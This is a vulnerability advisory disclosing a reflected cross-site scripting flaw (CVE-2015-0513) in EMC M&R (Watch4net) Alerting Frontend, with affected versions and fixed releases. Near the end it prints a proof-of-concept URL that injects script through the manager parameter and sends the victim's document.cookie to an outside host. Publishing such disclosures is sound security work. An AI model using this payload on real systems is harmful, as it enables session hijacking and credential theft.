Advisory

Han Sahin, November 2014

Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Alerting Frontend

Abstract

A Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net) Alerting Frontend. This issue allows attackers to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes, or exploit issues in other areas of Watch4net.

Affected products


EMC reports that the following products are affected by this vulnerability:

- EMC M&R (Watch4Net) versions prior 6.5u1
- EMC ViPR SRM versions prior to 3.6.1

See also

- CVE-2015-0513
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities (login required)

Fix

EMC released the following updated versions that resolve this vulnerability:

- EMC M&R (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM.

Introduction

EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard.

A Cross-Site Scripting vulnerability was found in the M&R (Watch4net) Alerting Frontend. This issue exists because user input is echoed unmodified (without encoding) in the application's response.

Details

This vulnerability can be exploited using the manager URL parameter. Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

The following proof of concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response in order to hijack the victim's session cookies:
http://<target>:58080/alerting-frontend/adapters/get?manager=Local%20Manager%3Cimg+src%3dx+onerror%3dthis.src%3d%27https%3a//www.securify.nl/%3fc%3d%27%2bdocument.cookie%3E&_=1411480546258

Latest News & Research

Work with us →